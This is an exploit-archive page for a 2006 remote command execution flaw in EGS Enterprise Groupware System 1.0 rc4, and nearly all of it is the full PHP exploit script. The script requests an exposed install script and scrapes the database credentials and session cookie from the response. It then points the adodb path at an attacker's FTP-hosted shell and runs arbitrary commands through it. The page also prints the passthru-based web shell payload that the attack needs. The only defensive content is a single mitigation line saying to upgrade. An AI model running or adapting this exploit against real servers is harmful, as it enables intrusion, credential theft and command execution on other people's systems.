header-logo
Suggest Exploit
vendor:
EGS
by:
rgod
7.5
CVSS
HIGH
Remote commands execution
78
CWE
Product Name: EGS
Affected Version From: 1.0 rc4
Affected Version To: 1.0 rc4
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2006

EGS Enterprise Groupware System <=1.0 rc4 remote commands execution exploit

EGS Enterprise Groupware System <=1.0 rc4 is vulnerable to remote commands execution. This exploit works against PHP5. The attacker needs to launch the exploit from Apache, fill in the requested fields, and then execute the commands remotely.

Mitigation:

Upgrade to a version higher than 1.0 rc4.
Source

Exploit-DB raw data:

<?php
#  ---egs_10rc4_php5_incl_xpl.php                           17.57 13/02/2006   #
#                                                                              #
#  EGS Enterprise Groupware System <=1.0 rc4 remote commands execution exploit #
#                              coded by rgod                                   #
#                     site: http://retrogod.altervista.org                     #
#                                                                              #
#  -> works against PHP5                                                       #
#  usage: launch from Apache, fill in requested fields, then go!               #
#                                                                              #
#  Sun-Tzu: "Thus the energy developed by good fighting men is as the momentum #
#  of a round stone rolled down a mountain thousands of feet in height. So     #
#  much on the subject of energy."                                             #

error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout", 2);
ob_implicit_flush (1);

echo'<html><head><title> ******** EGS <= 1.0 rc4 remote commands execution *****
</title><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css"> body {background-color:#111111;   SCROLLBAR-ARROW-COLOR:
#ffffff; SCROLLBAR-BASE-COLOR: black; CURSOR: crosshair; color:  #1CB081; }  img
{background-color:   #FFFFFF   !important}  input  {background-color:    #303030
!important} option {  background-color:   #303030   !important}         textarea
{background-color: #303030 !important} input {color: #1CB081 !important}  option
{color: #1CB081 !important} textarea {color: #1CB081 !important}        checkbox
{background-color: #303030 !important} select {font-weight: normal;       color:
#1CB081;  background-color:  #303030;}  body  {font-size:  8pt       !important;
background-color:   #111111;   body * {font-size: 8pt !important} h1 {font-size:
0.8em !important}   h2   {font-size:   0.8em    !important} h3 {font-size: 0.8em
!important} h4,h5,h6    {font-size: 0.8em !important}  h1 font {font-size: 0.8em
!important} 	h2 font {font-size: 0.8em !important}h3   font {font-size: 0.8em
!important} h4 font,h5 font,h6 font {font-size: 0.8em !important} * {font-style:
normal !important} *{text-decoration: none !important} a:link,a:active,a:visited
{ text-decoration: none ; color : #99aa33; } a:hover{text-decoration: underline;
color : #999933; } .Stile5 {font-family: Verdana, Arial, Helvetica,  sans-serif;
font-size: 10px; } .Stile6 {font-family: Verdana, Arial, Helvetica,  sans-serif;
font-weight:bold; font-style: italic;}--></style></head><body><p class="Stile6">
******** EGS <= 1.0 rc4 remote commands execution *****  </p><p class="Stile6">a
script  by  rgod  at    <a href="http://retrogod.altervista.org"target="_blank">
http://retrogod.altervista.org</a> </p> <table  width="84%"><tr><td width="43%">
<form name="form1" method="post"   action="'.$_SERVER[PHP_SELF].'">    <p><input
type="text"  name="host"> <span class="Stile5">* target    (ex:www.sitename.com)
</span></p> <p><input type="text" name="path">  <span class="Stile5">* path (ex:
/EGS/ or just / ) </span></p><p><input type="text" name="cmd">          <span
class="Stile5"> * specify a command   </span>   </p>   <p>   <input  type="text"
name="FTP_LOCATION"><span class="Stile5"> * specify an ftp resource (ex: ftp://u
sername:password@somehost.com/shell.php) </span> </p><p>      <input type="text"
name="port"><span class="Stile5">specify  a  port other than  80 (default value)
</span> </p><p><input   type="text" name="proxy"><span class="Stile5"> send  exp
loit through an HTTP proxy (ip:port) </span>  </p>  <p>   <input   type="submit"
name="Submit" value="go!"></p></form></td></tr></table></body></html>';

function show($headeri)
{
$ii=0;
$ji=0;
$ki=0;
$ci=0;
echo '<table border="0"><tr>';
while ($ii <= strlen($headeri)-1)
{
$datai=dechex(ord($headeri[$ii]));
if ($ji==16) {
             $ji=0;
             $ci++;
             echo "<td>&nbsp;&nbsp;</td>";
             for ($li=0; $li<=15; $li++)
                      { echo "<td>".htmlentities($headeri[$li+$ki])."</td>";
			    }
            $ki=$ki+16;
            echo "</tr><tr>";
            }
if (strlen($datai)==1) {echo "<td>0".htmlentities($datai)."</td>";} else
{echo "<td>".$datai."</td> ";}
$ii++;
$ji++;
}
for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++)
                      { echo "<td>&nbsp&nbsp</td>";
                       }

for ($li=$ci*16; $li<=strlen($headeri); $li++)
                      { echo "<td>".htmlentities($headeri[$li])."</td>";
			    }
echo "</tr></table>";
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';

function sendpacket() //if you have sockets module loaded, 2x speed! if not,load
		              //next function to send packets
{
  global $proxy, $host, $port, $packet, $html, $proxy_regex;
  $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
  if ($socket < 0) {
                   echo "socket_create() failed: reason: " . socket_strerror($socket) . "<br>";
                   }
	      else
 		  {   $c = preg_match($proxy_regex,$proxy);
              if (!$c) {echo 'Not a valid prozy...';
                        die;
                       }
                    echo "OK.<br>";
                    echo "Attempting to connect to ".$host." on port ".$port."...<br>";
                    if ($proxy=='')
		   {
		     $result = socket_connect($socket, $host, $port);
		   }
		   else
		   {

		   $parts =explode(':',$proxy);
                   echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';
		   $result = socket_connect($socket, $parts[0],$parts[1]);
		   }
		   if ($result < 0) {
                                     echo "socket_connect() failed.\r\nReason: (".$result.") " . socket_strerror($result) . "<br><br>";
                                    }
	                       else
		                    {
                                     echo "OK.<br><br>";
                                     $html= '';
                                     socket_write($socket, $packet, strlen($packet));
                                     echo "Reading response:<br>";
                                     while ($out= socket_read($socket, 2048)) {$html.=$out;}
                                     echo nl2br(htmlentities($html));
                                     echo "Closing socket...";
                                     socket_close($socket);

				    }
                  }
}
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='')
      {$ock=fsockopen(gethostbyname($host),$port);
       if (!$ock) { echo 'No response from '.htmlentities($host);
			die; }
      }
             else
           {
	   $c = preg_match($proxy_regex,$proxy);
              if (!$c) {echo 'Not a valid prozy...';
                        die;
                       }
	   $parts=explode(':',$proxy);
	    echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';
	    $ock=fsockopen($parts[0],$parts[1]);
	    if (!$ock) { echo 'No response from proxy...';
			die;
		       }
	   }
fputs($ock,$packet);
if ($proxy=='')
  {

    $html='';
    while (!feof($ock))
      {
        $html.=fgets($ock);
      }
  }
else
  {
    $html='';
    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html)))
    {
      $html.=fread($ock,1);
    }
  }
fclose($ock);
echo nl2br(htmlentities($html));
}

$host=$_POST[host];$path=$_POST[path];
$port=$_POST[port];$FTP_LOCATION=$_POST[FTP_LOCATION];
$cmd=urlencode($_POST[cmd]);$proxy=$_POST[proxy];
echo "<span class=\"Stile5\">";

if (($host<>'') and ($path<>'') and ($cmd<>'') and ($FTP_LOCATION<>''))
{
    $port=intval(trim($port));
    if ($port=='') {$port=80;}
    if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
    if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
    $host=str_replace("\r","",$host);$host=str_replace("\n","",$host);
    $path=str_replace("\r","",$path);$path=str_replace("\n","",$path);

    # STEP 1 -> Call the Fiyspray 0.9.7 installation script...
    $packet ="GET ".$p."modules/projects/sql/install-0.9.7.php?p=2 HTTP/1.1\r\n";
    $packet.="Host: ".$host."\r\n";
    $packet.="User-Agent: Rumours-Agent\r\n";
    $packet.="Connection: Close\r\n\r\n";
    show($packet);
    sendpacketii($packet);

    $temp=explode("basedir\" value=\"",$html);
    $temp2=explode("\"",$temp[1]);
    $basedir=$temp2[0];
    echo "basedir -> ".htmlentities($basedir)."<BR>";
    $temp=explode("dbhost\" value=\"",$html);
    $temp2=explode("\"",$temp[1]);
    $DB_HOST=$temp2[0];
    echo "DB HOST -> ".htmlentities($DB_HOST)."<BR>";
    $temp=explode("dbname\" value=\"",$html);
    $temp2=explode("\"",$temp[1]);
    $DB_NAME=$temp2[0];
    echo "DB NAME -> ".htmlentities($DB_NAME)."<BR>";
    $temp=explode("dbuser\" value=\"",$html);
    $temp2=explode("\"",$temp[1]);
    $DB_USER=$temp2[0];
    echo "DB USER -> ".htmlentities($DB_USER)."<BR>";
    $temp=explode("dbpass\" value=\"",$html);
    $temp2=explode("\"",$temp[1]);
    $DB_PASS=$temp2[0];
    echo "DB PASS -> ".strip_tags(htmlentities($DB_PASS))."<BR>";
    $temp=explode("Set-Cookie: ",$html);
    $temp2=explode(" ",$temp[1]);
    $COOKIE=$temp2[0];
    echo "COOKIE -> ".htmlentities($COOKIE)."<BR>";

    # STEP 2 -> submit the ftp resource with shell code inside...
    $data ="basedir=".urlencode($basedir);
    $data.="&adodbpath=".urlencode($FTP_LOCATION);
    $data.="&dbtype=pgsql";
    $data.="&dbuser=".urlencode($DB_USER);
    $data.="&dbname=".urlencode($DB_NAME);
    $data.="&dbhost=".urlencode($DB_HOST);
    $data.="&dbpass=".urlencode($DB_PASS);
    $packet ="POST ".$p."modules/projects/sql/install-0.9.7.php?p=3 HTTP/1.1\r\n";
    $packet.="Host: ".$host."\r\n";
    $packet.="User-Agent: Science Traveller International 1X/1.0\r\n";
    $packet.="Content-Type: application/x-www-form-urlencoded\r\n";
    $packet.="Content-Length: ".strlen($data)."\r\n";
    $packet.="Cookie: ".$COOKIE."\r\n";
    $packet.="Connection: Close\r\n\r\n";
    $packet.=$data;
    show($packet);
    sendpacketii($packet);

    # STEP 3 -> Launch commands...
    $packet ="GET ".$p."modules/projects/sql/install-0.9.7.php?p=4&cmd=".$cmd." HTTP/1.1\r\n";
    $packet.="Host: ".$host."\r\n";
    $packet.="User Agent: Googlebot 1.0\r\n";
    $packet.="Cookie: ".$COOKIE."\r\n";
    $packet.="Connection: Close\r\n\r\n";
    show($packet);
    sendpacketii($packet);
    if (eregi("HiMaster!",$html)) {echo "Exploit succeeded...";}
                             else {echo "Exploit failed...";}
}
else
{echo "Note: inside shell.php you need this code: <br>";
 echo  nl2br(htmlentities("
        <?php
        ob_clean();echo\"HiMaster!\";ini_set(\"max_execution_time\",0);phpinfo();passthru(\$HTTP_GET_VARS[cmd]);die;
        ?>
        "))."<br>";
  echo "Fill * required fields, optionally specify a proxy...";}
  echo "</span>";
?>

# milw0rm.com [2006-02-13]

Navigation

Suggest Exploit

Services By CQR